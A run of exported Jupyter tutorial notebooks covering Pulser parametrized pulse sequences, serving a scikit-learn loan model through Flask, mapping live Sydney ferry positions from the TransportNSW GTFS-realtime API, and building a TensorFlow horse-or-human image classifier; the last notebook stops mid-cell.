t_sweep = (delta_f - delta_0)/(2 * np.pi * 10) * 1000
###Output
_____no_output_____
###Markdown
Both the original `Variables` and the results of these operations serve as valid inputs for `Waveforms`, `Pulses` or `Sequence`-building instructions. We can take `Omega_max` as an argument for a waveform:
###Code
pi_wf = BlackmanWaveform.from_max_val(Omega_max, np.pi)
###Output
_____no_output_____
###Markdown
or use derived quantities, like `t_rise`, `t_fall`, `delta_0` and `delta_f`:
###Code
rise_wf = RampWaveform(t_rise, delta_0, delta_f)
fall_wf = RampWaveform(t_fall, delta_f, delta_0)
rise_fall_wf = CompositeWaveform(rise_wf, fall_wf)
###Output
_____no_output_____
###Markdown
These waveforms are *parametrized* objects, so usual attributes like `duration` or `samples` are not available, as they depend on the values of the underlying variables. Nonetheless, they can be used as regular waveforms when creating `Pulses`, which will consequently be *parametrized* too.
###Code
pi_pulse = Pulse.ConstantDetuning(pi_wf, 0, 0)
rise_fall = Pulse.ConstantAmplitude(Omega_max, rise_fall_wf, 0)
###Output
_____no_output_____
###Markdown
Constructing the Sequence Upon initialization, a `Sequence` is, by default, not parametrized. We can check this by calling:
###Code
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
While it is not parametrized, it is just a normal sequence. We can do the usual stuff, like targeting a local channel, adding regular pulses, or plotting the sequence:
###Code
generic_pulse = Pulse.ConstantPulse(100, 2*np.pi, 2, 0.)
seq.add(generic_pulse, "rydberg")
seq.target("q0", "raman")
seq.add(generic_pulse, "raman")
seq.draw()
###Output
_____no_output_____
###Markdown
The `Sequence` becomes parametrized at the moment a parametrized object or variable is given to a sequence-building instruction. For example:
###Code
seq.target(last_target, "raman")
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
From this point onward, functionalities like drawing are no longer available, because the instructions start being stored instead of executed on the fly. We can still check the current state of a parametrized sequence by printing it:
###Code
print(seq)
###Output
_____no_output_____
###Markdown
Naturally, we can also add the parametrized pulses we previously created:
###Code
seq.add(rise_fall, "rydberg")
seq.add(pi_pulse, "raman")
###Output
_____no_output_____
###Markdown
Building Once we're happy with our parametrized sequence, the last step is to build it into a regular sequence. For that, we call the `Sequence.build()` method, in which we **must attribute values for all the declared variables**:
###Code
built_seq = seq.build(Omega_max = 2.3 * 2*np.pi, ts = [200, 500], last_target="q3")
built_seq.draw()
###Output
_____no_output_____
###Markdown
And here we have a regular sequence, built from our parametrized sequence. To create a new one with different parameters, we can simply build it again with new values:
###Code
alt_seq = seq.build(Omega_max = 2*np.pi, ts = [400, 100], last_target="q2")
alt_seq.draw()
###Output
_____no_output_____
###Markdown
Parametrized Sequences
###Code
import numpy as np
import pulser
from pulser import Pulse, Sequence, Register
from pulser.waveforms import RampWaveform, BlackmanWaveform, CompositeWaveform
from pulser.devices import Chadoq2
###Output
_____no_output_____
###Markdown
From simple sweeps to variational quantum algorithms, it is often the case that one wants to try out multiple pulse sequences that vary only in a few parameters. For this effect, the ability to make a `Sequence` **parametrized** was developed.A parametrized `Sequence` can be used just like a "regular" `Sequence`, with a few key differences. Initialization and channel declaration, for example, don't change at all:
###Code
reg = Register.square(2, prefix='q')
seq = Sequence(reg, Chadoq2)
seq.declare_channel('rydberg', 'rydberg_global')
seq.declare_channel('raman', 'raman_local')
###Output
_____no_output_____
###Markdown
Variables and Parametrized Objects The defining characteristic of a `Sequence` that is parametrized is its use of **variables**. These variables are declared within a `Sequence`, by calling:
###Code
Omega_max = seq.declare_variable('Omega_max')
ts = seq.declare_variable('ts', size=2, dtype=int)
last_target = seq.declare_variable('last_target', dtype=str)
###Output
_____no_output_____
###Markdown
The returned `Omega_max`, `ts` and `last_target` objects are of type `Variable`, and are defined by their name, size and data type. In this case, `Omega_max` is a variable of `size=1` and `dtype=float` (the default), `ts` is an array of two `int` values and `last_target` is a string.These returned `Variable` objects support simple arithmetic operations (when applicable) and, when of `size > 1`, even item indexing. Take the following examples:
###Code
t_rise, t_fall = ts # Unpacking is possible too
U = Omega_max / 2.3
delta_0 = -6 * U
delta_f = 2 * U
t_sweep = (delta_f - delta_0)/(2 * np.pi * 10) * 1000
###Output
_____no_output_____
###Markdown
Both the original `Variables` and the results of these operations serve as valid inputs for `Waveforms`, `Pulses` or `Sequence`-building instructions. We can take `Omega_max` as an argument for a waveform:
###Code
pi_wf = BlackmanWaveform.from_max_val(Omega_max, np.pi)
###Output
_____no_output_____
###Markdown
or use derived quantities, like `t_rise`, `t_fall`, `delta_0` and `delta_f`:
###Code
rise_wf = RampWaveform(t_rise, delta_0, delta_f)
fall_wf = RampWaveform(t_fall, delta_f, delta_0)
rise_fall_wf = CompositeWaveform(rise_wf, fall_wf)
###Output
_____no_output_____
###Markdown
These waveforms are *parametrized* objects, so usual attributes like `duration` or `samples` are not available, as they depend on the values of the underlying variables. Nonetheless, they can be used as regular waveforms when creating `Pulses`, which will consequently be *parametrized* too.
###Code
pi_pulse = Pulse.ConstantDetuning(pi_wf, 0, 0)
rise_fall = Pulse.ConstantAmplitude(Omega_max, rise_fall_wf, 0)
###Output
_____no_output_____
###Markdown
Constructing the Sequence Upon initialization, a `Sequence` is, by default, not parametrized. We can check this by calling:
###Code
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
While it is not parametrized, it is just a normal sequence. We can do the usual stuff, like targeting a local channel, adding regular pulses, or plotting the sequence:
###Code
generic_pulse = Pulse.ConstantPulse(100, 2*np.pi, 2, 0.)
seq.add(generic_pulse, "rydberg")
seq.target("q0", "raman")
seq.add(generic_pulse, "raman")
seq.draw()
###Output
_____no_output_____
###Markdown
The `Sequence` becomes parametrized at the moment a parametrized object or variable is given to a sequence-building instruction. For example:
###Code
seq.target(last_target, "raman")
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
From this point onward, functionalities like drawing are no longer available, because the instructions start being stored instead of executed on the fly. We can still check the current state of a parametrized sequence by printing it:
###Code
print(seq)
###Output
Prelude
-------
Channel: rydberg
t: 0 | Initial targets: q2, q1, q0, q3 | Phase Reference: 0.0
t: 0->100 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q2, q1, q0, q3
Channel: raman
t: 0 | Initial targets: q0 | Phase Reference: 0.0
t: 0->100 | Delay
t: 100->200 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q0
Stored calls
------------
1. target(last_target, raman)
###Markdown
Naturally, we can also add the parametrized pulses we previously created:
###Code
seq.add(rise_fall, "rydberg")
seq.add(pi_pulse, "raman")
###Output
_____no_output_____
###Markdown
Building Once we're happy with our parametrized sequence, the last step is to build it into a regular sequence. For that, we call the `Sequence.build()` method, in which we **must attribute values for all the declared variables**:
###Code
built_seq = seq.build(Omega_max = 2.3 * 2*np.pi, ts = [200, 500], last_target="q3")
built_seq.draw()
###Output
_____no_output_____
###Markdown
And here we have a regular sequence, built from our parametrized sequence. To create a new one with different parameters, we can simply build it again with new values:
###Code
alt_seq = seq.build(Omega_max = 2*np.pi, ts = [400, 100], last_target="q2")
alt_seq.draw()
###Output
_____no_output_____ |
flask_model_settle_demo/notebooks/ML Models as APIs using Flask.ipynb | ###Markdown
Machine Learning models as APIs using Flask 1. Python Environment Setup & Flask Basics 2. Creating a Machine Learning Model
###Code
import os
import json
import numpy as np
import pandas as pd
from sklearn.externals import joblib
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import make_pipeline
import warnings
warnings.filterwarnings("ignore")
###Output
/Users/zhaoyadong/anaconda3/lib/python3.6/site-packages/sklearn/externals/joblib/__init__.py:15: FutureWarning: sklearn.externals.joblib is deprecated in 0.21 and will be removed in 0.23. Please import this functionality directly from joblib, which can be installed with: pip install joblib. If this warning is raised when loading pickled models, you may need to re-serialize those models with scikit-learn 0.21+.
warnings.warn(msg, category=FutureWarning)
###Markdown
- 数据集:训练集和测试集
###Code
!ls ../data/
data = pd.read_csv('../data/training.csv')
list(data.columns)
data.shape
###Output
_____no_output_____
###Markdown
- 找到列中的缺失值
###Code
for _ in data.columns:
print("The number of null values in:{} == {}".format(_, data[_].isnull().sum()))
###Output
The number of null values in:Loan_ID == 0
The number of null values in:Gender == 13
The number of null values in:Married == 3
The number of null values in:Dependents == 15
The number of null values in:Education == 0
The number of null values in:Self_Employed == 32
The number of null values in:ApplicantIncome == 0
The number of null values in:CoapplicantIncome == 0
The number of null values in:LoanAmount == 22
The number of null values in:Loan_Amount_Term == 14
The number of null values in:Credit_History == 50
The number of null values in:Property_Area == 0
The number of null values in:Loan_Status == 0
###Markdown
- 创建 `training` 和 `testing` 数据集:
###Code
pred_var = ['Gender','Married','Dependents','Education','Self_Employed','ApplicantIncome','CoapplicantIncome',\
'LoanAmount','Loan_Amount_Term','Credit_History','Property_Area']
X_train, X_test, y_train, y_test = train_test_split(data[pred_var],
data['Loan_Status'],
test_size=0.25,
random_state=42)
###Output
_____no_output_____
###Markdown
- 把处理过程写到一个类中`pre-processing` __custom pre-processing Scikit-learn `estimator`__
###Code
from sklearn.base import BaseEstimator, TransformerMixin
class PreProcessing(BaseEstimator, TransformerMixin):
"""Custom Pre-Processing estimator for our use-case
"""
def __init__(self):
pass
def transform(self, df):
pred_var = ['Gender','Married','Dependents','Education','Self_Employed','ApplicantIncome',\
'CoapplicantIncome','LoanAmount','Loan_Amount_Term','Credit_History','Property_Area']
df = df[pred_var]
df['Dependents'] = df['Dependents'].fillna(0)
df['Self_Employed'] = df['Self_Employed'].fillna('No')
df['Loan_Amount_Term'] = df['Loan_Amount_Term'].fillna(self.term_mean_)
df['Credit_History'] = df['Credit_History'].fillna(1)
df['Married'] = df['Married'].fillna('No')
df['Gender'] = df['Gender'].fillna('Male')
df['LoanAmount'] = df['LoanAmount'].fillna(self.amt_mean_)
gender_values = {'Female' : 0, 'Male' : 1}
married_values = {'No' : 0, 'Yes' : 1}
education_values = {'Graduate' : 0, 'Not Graduate' : 1}
employed_values = {'No' : 0, 'Yes' : 1}
property_values = {'Rural' : 0, 'Urban' : 1, 'Semiurban' : 2}
dependent_values = {'3+': 3, '0': 0, '2': 2, '1': 1}
df.replace(
{
'Gender': gender_values,
'Married': married_values,
'Education': education_values,
'Self_Employed': employed_values,
'Property_Area': property_values,
'Dependents': dependent_values
}, inplace=True
)
return df.as_matrix()
def fit(self, df, y=None, **fit_params):
self.term_mean_ = df['Loan_Amount_Term'].mean()
self.amt_mean_ = df['LoanAmount'].mean()
return self
###Output
_____no_output_____
###Markdown
- 把`y_train` 和 `y_test` 转换后才 `np.array`:
###Code
y_train = y_train.replace({'Y':1, 'N':0}).as_matrix()
y_test = y_test.replace({'Y':1, 'N':0}).as_matrix()
###Output
_____no_output_____
###Markdown
使用管道去确保整个数据预处理流程做到一个`scikit-learn estimator`.
###Code
pipe = make_pipeline(PreProcessing(),RandomForestClassifier())
pipe
###Output
_____no_output_____
###Markdown
- 使用网格搜索法选择参数使用`Grid Search`,搜索最佳`hyper-parameters` (`degree` for `PolynomialFeatures` & `alpha` for `Ridge`):- 定义`param_grid`:
###Code
param_grid = {"randomforestclassifier__n_estimators" : [10, 20, 30],
"randomforestclassifier__max_depth" : [None, 6, 8, 10],
"randomforestclassifier__max_leaf_nodes": [None, 5, 10, 20],
"randomforestclassifier__min_impurity_split": [0.1, 0.2, 0.3]}
###Output
_____no_output_____
###Markdown
- 运行`Grid Search`:
###Code
grid = GridSearchCV(pipe, param_grid=param_grid, cv=3)
###Output
_____no_output_____
###Markdown
- 训练模型 `pipeline estimator`:
###Code
grid.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
- 查看Grid Search选择的最佳参数和分数:
###Code
print("Best parameters: {}".format(grid.best_params_))
print("Validation set score: {:.2f}".format(grid.score(X_test, y_test)))
###Output
Validation set score: 0.77
###Markdown
- 加载测试集:
###Code
test_df = pd.read_csv('../data/test.csv', encoding="utf-8")
test_df = test_df.head()
test_df
grid.predict(test_df)
###Output
_____no_output_____
###Markdown
__Serialize the Machine Learning Model__ 3. 保存机器学习模型:序列化和反序列化 python 中一般是使用pickle模块来实现序列化和反序列化:- 序列化是指将一个对象转换为一个能够存储在一个文件中或者网络上进行传输的字节流的过程。- 反序列化指的是相反的过程,它是从字节流中提取对象的过程。
###Code
list_to_pickle = [1, 'here', 123, 'walker']
#Pickling the list
import pickle
# 序列化
list_pickle = pickle.dumps(list_to_pickle)
list_pickle
###Output
_____no_output_____
###Markdown
When we load the pickle back:
###Code
# 反序列化
loaded_pickle = pickle.loads(list_pickle)
loaded_pickle
###Output
_____no_output_____
###Markdown
NOTE:* 在我们实际部署机器学习模型的过程中,一般是把训练好的模型序列化到一个文件夹中(一般使用pickle和h5py)* dill将python用于序列化和反序列化python对象的pickle模块扩展到大多数内置python类型。比如嵌套函数类型的对象pickle不可以存储,但dill可以。dill提供和pickle相同的接口,使用时,“import dill as pickle”即可。
###Code
!pip install dill
import dill as pickle
filename = 'model_v2.pk'
with open('../flask_api/models/'+filename, 'wb') as file:
pickle.dump(grid, file)
###Output
_____no_output_____
###Markdown
这样我们就将我们训练的最佳模型给序列化出来了`model_v2.pk`,我们在Flask使用前先测试下。。。
###Code
with open('../flask_api/models/'+filename ,'rb') as f:
loaded_model = pickle.load(f)
loaded_model.predict(test_df)
###Output
_____no_output_____
###Markdown
4. Creating an API using Flask 我们的文件目录结构如下图所示:There are three important parts in constructing our wrapper function, **`apicall()`**:- Getting the **`request`** data (for which predictions are to be made)- Loading our **`pickled estimator`**- **`jsonify`** our predictions and send the response back with **`status code: 200`**HTTP messages are made of a header and a body. As a standard, majority of the body content sent across are in **`json`** format. We'll be sending (**`POST url-endpoint/`**) the incoming data as batch to get predictions.(__NOTE:__ You can send plain **text, XML, csv or image** directly but for the sake of interchangeability of the format, it is advisable to use **`json`**) ```python"""Filename: server.py"""import osimport pandas as pdfrom sklearn.externals import joblibfrom flask import Flask, jsonify, requestapp = Flask(__name__)@app.route('/predict', methods=['POST'])def apicall(): """API Call Pandas dataframe (sent as a payload) from API Call """ try: test_json = request.get_json() test = pd.read_json(test_json, orient='records') To resolve the issue of TypeError: Cannot compare types 'ndarray(dtype=int64)' and 'str' test['Dependents'] = [str(x) for x in list(test['Dependents'])] Getting the Loan_IDs separated out loan_ids = test['Loan_ID'] except Exception as e: raise e clf = 'model_v2.pk' if test.empty: return(bad_request()) else: Load the saved model print("Loading the model...") loaded_model = None with open('./models/'+clf,'rb') as f: loaded_model = pickle.load(f) print("The model has been loaded...doing predictions now...") predictions = loaded_model.predict(test) """Add the predictions as Series to a new pandas dataframe OR Depending on the use-case, the entire test data appended with the new files """ prediction_series = list(pd.Series(predictions)) final_predictions = pd.DataFrame(list(zip(loan_ids, prediction_series))) """We can be as creative in sending the responses. But we need to send the response codes as well. """ responses = jsonify(predictions=final_predictions.to_json(orient="records")) responses.status_code = 200 return (responses)```Once done, run: `gunicorn --bind 0.0.0.0:8000 server:app` Let's generate some prediction data and query the API running locally at `https:0.0.0.0:8000/predict`
###Code
import json
import requests
"""Setting the headers to send and accept json responses
"""
header = {'Content-Type': 'application/json',
'Accept': 'application/json'}
"""Reading test batch
"""
df = pd.read_csv('../data/test.csv', encoding="utf-8-sig")
df = df.head()
"""Converting Pandas Dataframe to json
"""
data = df.to_json(orient='records')
data
"""POST <url>/predict
"""
resp = requests.post("http://0.0.0.0:8000/predict", \
data = json.dumps(data),\
headers= header)
resp.status_code
"""The final response we get is as follows:
"""
###Output
_____no_output_____ |
Notebook #15b - API.ipynb | ###Markdown
Week 8: Introduction to APIs Introduction to APIs AimsThis exercise aims to introduce you to we APIs and get you familiar with accessing them via Python. the objectives are,- Send a simple API request- Understand the status codes- Send a API request with Authentication- Parsing the returned data- Plotting the data to create a map! At the end of this tutorial you should be fairly confident to go on and explore other API's and be able to move on to more complex methods of authentication such as 'Oauth'. Installing the basicsBefore we connect to some API's we need libraries which enable Python to be able to connect to them and send/recieve data from them. The library we will use is called `requests`. Install the library and load it by running the commands below,
###Code
# Install a packages requried for the current tutorial
import sys
!{sys.executable} -m pip install -q requests
!{sys.executable} -m pip install -q google
!{sys.executable} -m pip install -q google-api-python-client
!{sys.executable} -m pip install -q gtfs-realtime-bindings
!{sys.executable} -m pip install -q pandas
!{sys.executable} -m pip install -q geopandas
!{sys.executable} -m pip install -q matplotlib
!{sys.executable} -m pip install -q folium
# Import the installed packages into current environment
import requests
import folium
import time
import pandas
import geopandas
from google.transit import gtfs_realtime_pb2
from shapely.geometry import Point
from IPython import display
###Output
_____no_output_____
###Markdown
Now we are all set.Let's explore some web API's! Connecting to your First APILet's jump start things by connecting to an API and downloading some data. We will use the TransportNSW's live vehicle position API available here https://opendata.transport.nsw.gov.au/dataset/public-transport-realtime-vehicle-positions.Okay let's send our first get query!
###Code
# Create a result object with the Transport API
result = requests.get('https://api.transport.nsw.gov.au/v1/gtfs/vehiclepos/ferries/sydneyferries')
###Output
_____no_output_____
###Markdown
Wait! you must be wondering that there is nothing here and what happened? Basically we have created the object successfully. No error message is good news here.Now lets examine the resulted object closely. First thing we need to check the `Status Code` of the result. This code says how successful the API request has been.
###Code
result.status_code
###Output
_____no_output_____
###Markdown
Hmm, Thats cryptic... Basically every code here corresponds to certain status the common ones are given below,Code | Status | Description---|---|---200 | OK | The request was successfully completed.201 | Created | A new resource was successfully created.400 | Bad Request | The request was invalid.401 | Unauthorized | The request did not include an authentication token or the authentication token was expired.403 | Forbidden | The client did not have permission to access the requested resource.404 | Not Found | The requested resource was not found.405 | Method Not Allowed | The HTTP method in the request was not supported by the resource. For example, the DELETE method cannot be used with the Agent API.409 | Conflict | The request could not be completed due to a conflict. For example, POST ContentStore Folder API cannot complete if the given file or folder name already exists in the parent location.500 | Internal Server Error | The request was not completed due to an internal error on the server side.503 | Service Unavailable | The server was unavailable. Our status code is 401 showing that we have some problem related to authentication. Lets print the text sent along with the response to see what the problem has been.
###Code
result.text
###Output
_____no_output_____
###Markdown
Thats a lot of information! You can see that the text in the result object is in `JSON` (JavaScript Object Notation) format. If we parse it properly, we can query components of this object without printing everything.
###Code
# Parse the result
result_json = result.json()
# Print just the error message
result_json['ErrorDetails']['Message']
###Output
_____no_output_____
###Markdown
So basically, our API request has been rejected since it had no authentication details.Most API providers will restrict the use of their APIs (even open ones) to avoid abuse.We might have to create an account and get authetication details to use this API. Authenticating with API keyFor this class I have already signed up with the transportNSW developer website, created an application and generated an API key.The key is `CGrnUTmzoaCL57n9TzoseFqUb22Pqz32m1eB`. Now we have to send this key on the header of the request.
###Code
# Create a headers object
headers = {'Authorization' : 'apikey CGrnUTmzoaCL57n9TzoseFqUb22Pqz32m1eB'}
# Create a request with the headers
result = requests.get(url='https://api.transport.nsw.gov.au/v1/gtfs/vehiclepos/ferries/sydneyferries', headers=headers)
# Check the status
result.status_code
###Output
_____no_output_____
###Markdown
Yay! That has worked... Lets start to explore the data that has been sent back.
###Code
# Print the first 20 lines of the raw text
# The command looks complicated but you can also do
# print(result.text) to get all the results
''.join(str.split(result.text)[:20])
###Output
_____no_output_____
###Markdown
That is not helpful at all... The format of the returned data is `protobuf` (Protocol buffers) which is used to compress the data sent back and forth using APIs - especially realtime ones like this.Now we need to parse and understand the result that has been sent back. Parsing GTFS-realtime dataAs we saw before, GTFS-realtime data is in protobuf format which needs to be parsed into a python object so that we can plot it on a map.We need to create an feed object from the gtfs_realtime_pb2 package which can parse the result
###Code
# creating a feed object
feed = gtfs_realtime_pb2.FeedMessage()
# Use the feed object to parse the result of the API
feed.ParseFromString(result.content)
# Print the results
feed.entity[0]
###Output
_____no_output_____
###Markdown
If all of these feed objects and parsing sounds complicated, It's alright. All you need to know is that there are different formats of data returned from different API's and you need to convert them in python to be able to make sense out of them.Now we have successfully traslated the data into a format we can read! Lets convert it in to a tabular format.The code below should create a table using the data from the API and with the ID,
###Code
data = pandas.DataFrame()
for i in feed.entity :
row = pandas.Series([i.id,float(i.vehicle.position.latitude),float(i.vehicle.position.longitude)])
row_df = pandas.DataFrame([row])
data = pandas.concat([data,row_df],ignore_index=True)
data.columns = ['id','lat','lng']
data
###Output
_____no_output_____
###Markdown
Plotting the API on a MapWe have the data from TransportNSW in a tabular format. The next step is to convert it into geographic data format and visualise it in realtime.Geographic data has three components - Geometry, Atrributes and Coordinate Reference Systems. We already have the attributes in the form of the table. Now we need to create the CRS and geometry.The code below does both,
###Code
# Create a simple CRS string - 4326 is WSG84 a.k.a latitude and longitude numbers.
crs = 'epsg:4326'
# We create the geometry from the lat, lng columns of the table
geometry = [Point(xy) for xy in zip(data['lng'],data['lat'])]
geo_data = geopandas.GeoDataFrame(data,crs=crs,geometry=geometry)
# We convert the geodata into JSON format so that it can be mapped easily
geo_json = geo_data.to_json()
###Output
_____no_output_____
###Markdown
Now we have all that is needed to make an interactive map! The `geo_json` object can now be added on top of a base map using the `folium` library as shown below,
###Code
# Create a base map with the specified style, center point and zoom level
m = folium.Map(location=[-33.854504, 151.218034],
tiles='Stamen Toner',
zoom_start=11)
# Add the geo_json to the map as points
m.add_child(folium.features.GeoJson(geo_json))
###Output
_____no_output_____
###Markdown
Thats it!We downloaded data from TransportNSW on the real time location of Ferries and made a map out of it all within 20 mins! This is how powerful and simple APIs are. They simplify and standardise most of the data dissemination and secondary data collection so that we can focus on our research and analysis. Simple Application using the APIBelow is an example application using the TransportNSW API. When we combine all the steps we did before into a sequence and repeat them every 5 seconds, we can build a simple monitoring station which shows the real-time location of all the ferries.
###Code
for i in range(1):
result = requests.get(url='https://api.transport.nsw.gov.au/v1/gtfs/vehiclepos/ferries/sydneyferries', headers=headers)
feed = gtfs_realtime_pb2.FeedMessage()
feed.ParseFromString(result.content)
data = pandas.DataFrame()
for i in feed.entity :
row = pandas.Series([i.id,float(i.vehicle.position.latitude),float(i.vehicle.position.longitude)])
row_df = pandas.DataFrame([row])
data = pandas.concat([data,row_df],ignore_index=True)
data.columns = ['id','lat','lng']
geometry = [Point(xy) for xy in zip(data['lng'],data['lat'])]
geo_data = geopandas.GeoDataFrame(data,crs=crs,geometry=geometry)
geo_json = geo_data.to_json()
m = folium.Map(location=[-33.854504, 151.218034],tiles='Stamen Toner', zoom_start=14)
folium_plot = m.add_child(folium.features.GeoJson(geo_json))
display.clear_output(wait=True)
display.display(folium_plot)
time.sleep(5)
###Output
_____no_output_____ |
deep-learning/Tensorflow-2.x/Browser-Based-Models/Course 1 - Part 8 - Lesson 3 - Notebook.ipynb | ###Markdown
The following python code will use the OS library to use Operating System libraries, giving you access to the file system, and the zipfile library allowing you to unzip the data.
###Code
import os
import zipfile
local_zip = '/tmp/horse-or-human.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('/tmp/horse-or-human')
local_zip = '/tmp/validation-horse-or-human.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('/tmp/validation-horse-or-human')
zip_ref.close()
###Output
_____no_output_____
###Markdown
The contents of the .zip are extracted to the base directory `/tmp/horse-or-human`, which in turn each contain `horses` and `humans` subdirectories.In short: The training set is the data that is used to tell the neural network model that 'this is what a horse looks like', 'this is what a human looks like' etc. One thing to pay attention to in this sample: We do not explicitly label the images as horses or humans. If you remember with the handwriting example earlier, we had labelled 'this is a 1', 'this is a 7' etc. Later you'll see something called an ImageGenerator being used -- and this is coded to read images from subdirectories, and automatically label them from the name of that subdirectory. So, for example, you will have a 'training' directory containing a 'horses' directory and a 'humans' one. ImageGenerator will label the images appropriately for you, reducing a coding step. Let's define each of these directories:
###Code
# Directory with our training horse pictures
train_horse_dir = os.path.join('/tmp/horse-or-human/horses')
# Directory with our training human pictures
train_human_dir = os.path.join('/tmp/horse-or-human/humans')
# Directory with our training horse pictures
validation_horse_dir = os.path.join('/tmp/validation-horse-or-human/horses')
# Directory with our training human pictures
validation_human_dir = os.path.join('/tmp/validation-horse-or-human/humans')
###Output
_____no_output_____
###Markdown
Now, let's see what the filenames look like in the `horses` and `humans` training directories:
###Code
train_horse_names = os.listdir(train_horse_dir)
print(train_horse_names[:10])
train_human_names = os.listdir(train_human_dir)
print(train_human_names[:10])
validation_horse_hames = os.listdir(validation_horse_dir)
print(validation_horse_hames[:10])
validation_human_names = os.listdir(validation_human_dir)
print(validation_human_names[:10])
###Output
_____no_output_____
###Markdown
Let's find out the total number of horse and human images in the directories:
###Code
print('total training horse images:', len(os.listdir(train_horse_dir)))
print('total training human images:', len(os.listdir(train_human_dir)))
print('total validation horse images:', len(os.listdir(validation_horse_dir)))
print('total validation human images:', len(os.listdir(validation_human_dir)))
###Output
_____no_output_____
###Markdown
Now let's take a look at a few pictures to get a better sense of what they look like. First, configure the matplot parameters:
###Code
%matplotlib inline
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
# Parameters for our graph; we'll output images in a 4x4 configuration
nrows = 4
ncols = 4
# Index for iterating over images
pic_index = 0
###Output
_____no_output_____
###Markdown
Now, display a batch of 8 horse and 8 human pictures. You can rerun the cell to see a fresh batch each time:
###Code
# Set up matplotlib fig, and size it to fit 4x4 pics
fig = plt.gcf()
fig.set_size_inches(ncols * 4, nrows * 4)
pic_index += 8
next_horse_pix = [os.path.join(train_horse_dir, fname)
for fname in train_horse_names[pic_index-8:pic_index]]
next_human_pix = [os.path.join(train_human_dir, fname)
for fname in train_human_names[pic_index-8:pic_index]]
for i, img_path in enumerate(next_horse_pix+next_human_pix):
# Set up subplot; subplot indices start at 1
sp = plt.subplot(nrows, ncols, i + 1)
sp.axis('Off') # Don't show axes (or gridlines)
img = mpimg.imread(img_path)
plt.imshow(img)
plt.show()
###Output
_____no_output_____
###Markdown
Building a Small Model from ScratchBut before we continue, let's start defining the model:Step 1 will be to import tensorflow.
###Code
import tensorflow as tf
###Output
_____no_output_____
###Markdown
We then add convolutional layers as in the previous example, and flatten the final result to feed into the densely connected layers. Finally we add the densely connected layers. Note that because we are facing a two-class classification problem, i.e. a *binary classification problem*, we will end our network with a [*sigmoid* activation](https://wikipedia.org/wiki/Sigmoid_function), so that the output of our network will be a single scalar between 0 and 1, encoding the probability that the current image is class 1 (as opposed to class 0).
###Code
model = tf.keras.models.Sequential([
# Note the input shape is the desired size of the image 300x300 with 3 bytes color
# This is the first convolution
tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(300, 300, 3)),
tf.keras.layers.MaxPooling2D(2, 2),
# The second convolution
tf.keras.layers.Conv2D(32, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# The third convolution
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# The fourth convolution
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# The fifth convolution
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# Flatten the results to feed into a DNN
tf.keras.layers.Flatten(),
# 512 neuron hidden layer
tf.keras.layers.Dense(512, activation='relu'),
# Only 1 output neuron. It will contain a value from 0-1 where 0 for 1 class ('horses') and 1 for the other ('humans')
tf.keras.layers.Dense(1, activation='sigmoid')
])
###Output
_____no_output_____
###Markdown
The model.summary() method call prints a summary of the NN
###Code
model.summary()
###Output
_____no_output_____
###Markdown
The "output shape" column shows how the size of your feature map evolves in each successive layer. The convolution layers reduce the size of the feature maps by a bit due to padding, and each pooling layer halves the dimensions. Next, we'll configure the specifications for model training. We will train our model with the `binary_crossentropy` loss, because it's a binary classification problem and our final activation is a sigmoid. (For a refresher on loss metrics, see the [Machine Learning Crash Course](https://developers.google.com/machine-learning/crash-course/descending-into-ml/video-lecture).) We will use the `rmsprop` optimizer with a learning rate of `0.001`. During training, we will want to monitor classification accuracy.**NOTE**: In this case, using the [RMSprop optimization algorithm](https://wikipedia.org/wiki/Stochastic_gradient_descentRMSProp) is preferable to [stochastic gradient descent](https://developers.google.com/machine-learning/glossary/SGD) (SGD), because RMSprop automates learning-rate tuning for us. (Other optimizers, such as [Adam](https://wikipedia.org/wiki/Stochastic_gradient_descentAdam) and [Adagrad](https://developers.google.com/machine-learning/glossary/AdaGrad), also automatically adapt the learning rate during training, and would work equally well here.)
###Code
from tensorflow.keras.optimizers import RMSprop
model.compile(loss='binary_crossentropy',
optimizer=RMSprop(lr=0.001),
metrics=['acc'])
###Output
_____no_output_____
###Markdown
Data PreprocessingLet's set up data generators that will read pictures in our source folders, convert them to `float32` tensors, and feed them (with their labels) to our network. We'll have one generator for the training images and one for the validation images. Our generators will yield batches of images of size 300x300 and their labels (binary).As you may already know, data that goes into neural networks should usually be normalized in some way to make it more amenable to processing by the network. (It is uncommon to feed raw pixels into a convnet.) In our case, we will preprocess our images by normalizing the pixel values to be in the `[0, 1]` range (originally all values are in the `[0, 255]` range).In Keras this can be done via the `keras.preprocessing.image.ImageDataGenerator` class using the `rescale` parameter. This `ImageDataGenerator` class allows you to instantiate generators of augmented image batches (and their labels) via `.flow(data, labels)` or `.flow_from_directory(directory)`. These generators can then be used with the Keras model methods that accept data generators as inputs: `fit_generator`, `evaluate_generator`, and `predict_generator`.
###Code
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# All images will be rescaled by 1./255
train_datagen = ImageDataGenerator(rescale=1/255)
validation_datagen = ImageDataGenerator(rescale=1/255)
# Flow training images in batches of 128 using train_datagen generator
train_generator = train_datagen.flow_from_directory(
'/tmp/horse-or-human/', # This is the source directory for training images
target_size=(300, 300), # All images will be resized to 150x150
batch_size=128,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
# Flow training images in batches of 128 using train_datagen generator
validation_generator = validation_datagen.flow_from_directory(
'/tmp/validation-horse-or-human/', # This is the source directory for training images
target_size=(300, 300), # All images will be resized to 150x150
batch_size=32,
# Since we use binary_crossentropy loss, we need binary labels
